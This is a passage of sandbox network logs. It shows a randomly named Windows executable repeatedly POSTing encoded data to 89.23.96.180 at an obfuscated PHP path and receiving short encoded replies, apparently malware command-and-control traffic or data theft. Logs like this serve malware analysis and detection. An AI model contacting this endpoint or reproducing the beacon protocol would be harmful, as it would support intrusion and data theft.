Dec 21, 2024 10:03:14.200320005 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 0e 1e 39 56 21 38 2d 1f 28 2a 3c 01 3d 2c 2e 51 3d 58 36 5e 3b 32 20 03 22 02 2e 10 29 2d 23 13 26 2e 33 13 23 3a 32 00 21 01 20 02 29 21 2e 58 01 1e 21 43 37 1d 31 53 30 3f 2f 57 2a 37 32 5a 28 3e 32 58 24 2c 2b 56 26 2a 3f 00 3f 2a 20 13 27 2e 3d 05 2f 06 20 01 3c 00 2b 0d 30 1c 2b 51 03 1e 26 11 24 2f 3f 1e 25 33 21 59 24 2d 21 15 37 2e 30 0a 3d 01 2b 57 21 2b 0c 5f 2c 17 24 58 29 2d 00 10 3e 28 32 59 27 2c 2c 0d 26 04 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 989V!8-(<=,.Q=X6^;2 ".)-#&.3#:2! )!.X!C71S0?/W72Z(>2X$,+V&?? '.=/ <+0+Q&$/?%3!Y$-!7.0=+W!+_,$X)->(2Y',,&#T-,H1]V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49860	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:12.732861996 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:13.077872038 CET	2536	OUT	Data Raw: 58 51 43 56 58 5c 57 54 55 5e 55 5a 54 53 50 54 57 5e 5c 5f 52 56 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XQCVX\WTU^UZTSPTW^\_RVQVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#- 1>=W)-?/0?-%#2.T<'8(8Z*!_.#Q,
Dec 21, 2024 10:03:14.110999107 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:14.345910072 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49866	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:14.587723017 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue
Dec 21, 2024 10:03:14.937371969 CET	2536	OUT	Data Raw: 58 51 46 50 58 5a 52 57 55 5e 55 5a 54 5f 50 51 57 5e 5c 5d 52 56 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XQFPXZRWU^UZT_PQW^\]RVQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ ,!3%-?!&,?'<R.5S#?5&T!?$]<-,)5!_.#Q,6
Dec 21, 2024 10:03:15.964498997 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:16.200102091 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49872	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:16.450193882 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:16.796677113 CET	2536	OUT	Data Raw: 58 57 43 52 5d 5d 52 53 55 5e 55 5a 54 5e 50 56 57 5f 5c 58 52 56 51 57 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XWCR]]RSU^UZT^PVW_\XRVQWZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ E-$-=>!].<<]$U9-Q",6116*'?+=!_.#Q,2
Dec 21, 2024 10:03:17.826412916 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:18.060036898 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49878	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:18.304194927 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2528 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:18.656219959 CET	2528	OUT	Data Raw: 58 5e 43 5e 5d 5b 57 56 55 5e 55 5a 54 5b 50 55 57 5d 5c 58 52 55 51 57 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: X^C^][WVU^UZT[PUW]\XRUQWZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ :2$2.?".<<$,3-(7<'2T';?>+*!_.#Q,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49879	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:19.323671103 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2084 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:19.671624899 CET	2084	OUT	Data Raw: 5d 54 43 51 5d 5e 52 50 55 5e 55 5a 54 5f 50 57 57 5b 5c 5c 52 5e 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]TCQ]^RPU^UZT_PWW[\\R^Q[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#:($>!>9[-,3%?#9;>"/5Z'2%<#\?[*5!_.#Q,6
Dec 21, 2024 10:03:20.702681065 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:20.936233044 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 0e 1e 39 1e 20 38 35 56 3f 04 28 02 3e 11 32 1d 2b 3d 39 04 2f 1c 30 05 21 05 2d 06 29 04 27 10 33 3e 37 5a 21 14 29 5a 22 11 3f 5a 3e 0b 2e 58 01 1e 22 1b 21 23 2d 52 33 01 37 1e 3e 37 2a 17 28 10 22 10 26 3f 33 52 31 03 37 07 28 03 24 1c 26 3e 3d 05 2d 2c 33 10 3f 10 20 50 33 26 2b 51 03 1e 26 1f 32 02 2b 56 24 33 35 58 32 3d 21 1b 37 3d 2b 57 3e 38 05 52 20 2b 36 19 2c 5f 38 5c 3f 3e 3d 01 2b 2b 32 5a 27 02 28 09 24 2e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 989 85V?(>2+=9/0!-)'3>7Z!)Z"?Z>.X"!#-R37>7*("&?3R17($&>=-,3? P3&+Q&2+V$35X2=!7=+W>8R +6,_8\?>=++2Z'($.#T-,H1]V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49880	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:19.446525097 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:19.796644926 CET	2532	OUT	Data Raw: 58 54 43 5e 5d 59 52 50 55 5e 55 5a 54 5b 50 56 57 5c 5c 5a 52 52 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XTC^]YRPU^UZT[PVW\\ZRRQ[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#,!3%&=:<]3$T.- 91.<B?<$_)%!_.#Q,*
Dec 21, 2024 10:03:20.822717905 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:21.056458950 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49886	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:21.304965019 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue
Dec 21, 2024 10:03:21.656048059 CET	2536	OUT	Data Raw: 58 56 43 56 58 5d 52 55 55 5e 55 5a 54 59 50 5d 57 5a 5c 5b 52 51 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XVCVX]RUU^UZTYP]WZ\[RQQVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ B.W$&[=>"&-#',S:)R4!\&2+B<?/)!_.#Q,.
Dec 21, 2024 10:03:22.681952953 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:22.916294098 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49892	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:23.181540012 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue
Dec 21, 2024 10:03:23.531157970 CET	2536	OUT	Data Raw: 58 5f 43 54 58 5c 57 51 55 5e 55 5a 54 5d 50 56 57 5b 5c 5d 52 51 51 57 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: X_CTX\WQU^UZT]PVW[\]RQQWZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#.!0V&*"=^./$$/-"4<'"?4?=!_.#Q,>
Dec 21, 2024 10:03:24.572820902 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:24.792654037 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49898	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:25.037494898 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:25.391743898 CET	2536	OUT	Data Raw: 58 57 43 57 58 5d 57 57 55 5e 55 5a 54 5e 50 57 57 5e 5c 5d 52 56 51 5e 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XWCWX]WWU^UZT^PWW^\]RVQ^ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ 9R%-Q*!.900<<:4Y5]2"T(7(<=+)!_.#Q,2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49899	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:26.058182001 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2112 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:26.406065941 CET	2112	OUT	Data Raw: 5d 54 46 57 5d 5d 57 57 55 5e 55 5a 54 5f 50 5c 57 52 5c 5b 52 53 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]TFW]]WWU^UZT_P\WR\[RSQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#9"'2W*-^-$]3$-(9#:16T+Z?^+%!_.#Q,6
Dec 21, 2024 10:03:27.438586950 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:27.672333002 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 0e 1e 3a 0f 20 3b 2a 0c 3f 03 33 5a 29 11 36 1d 2b 2e 3e 58 2f 0c 37 5e 21 2c 2d 07 3e 3e 37 5e 30 00 20 00 23 2a 32 03 35 3c 20 07 3d 21 2e 58 01 1e 22 1a 23 20 35 52 24 59 37 57 3e 09 29 07 3f 07 26 5a 27 3c 28 0a 25 39 27 06 3f 03 27 0c 26 2e 26 5a 3b 11 01 5a 28 00 20 50 27 26 2b 51 03 1e 26 5b 26 02 2b 1c 26 0a 35 13 31 00 2a 00 34 58 2f 54 2a 38 01 56 20 3b 0c 16 2c 2a 3f 04 3c 3d 3a 10 2a 06 2e 5e 24 12 28 0d 32 04 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 98: ;?3Z)6+.>X/7^!,->>7^0 #25< =!.X"# 5R$Y7W>)?&Z'<(%9'?'&.&Z;Z( P'&+Q&[&+&514X/T8V ;,?<=:.^$(2#T-,H1]V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49900	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:26.225400925 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:26.577965021 CET	2536	OUT	Data Raw: 58 53 43 57 5d 5d 57 56 55 5e 55 5a 54 53 50 57 57 52 5c 5b 52 57 51 58 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XSCW]]WVU^UZTSPWWR\[RWQXZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#:81!)\-,_%/$U:P#"'"&T<8?7)5!_.#Q,
Dec 21, 2024 10:03:27.602607965 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:27.837593079 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49906	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:28.087495089 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue
Dec 21, 2024 10:03:28.437304974 CET	2536	OUT	Data Raw: 58 54 46 57 5d 5b 57 51 55 5e 55 5a 54 5e 50 50 57 5c 5c 5a 52 52 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XTFW][WQU^UZT^PPW\\ZRRQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ :(S&.=Q=!\.Y,$0S-;9 Y52""U+4_? _>%!_.#Q,2
Dec 21, 2024 10:03:29.468010902 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:29.700345039 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49912	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:29.950001001 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:30.296660900 CET	2536	OUT	Data Raw: 58 57 43 50 58 5c 57 53 55 5e 55 5a 54 5d 50 5c 57 5a 5c 59 52 54 51 5f 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XWCPX\WSU^UZT]P\WZ\YRTQ_ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ :(W$=.?!![-\0,,U,(!",!\1+$ <><Z)!_.#Q,>
Dec 21, 2024 10:03:31.326145887 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:31.560184956 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

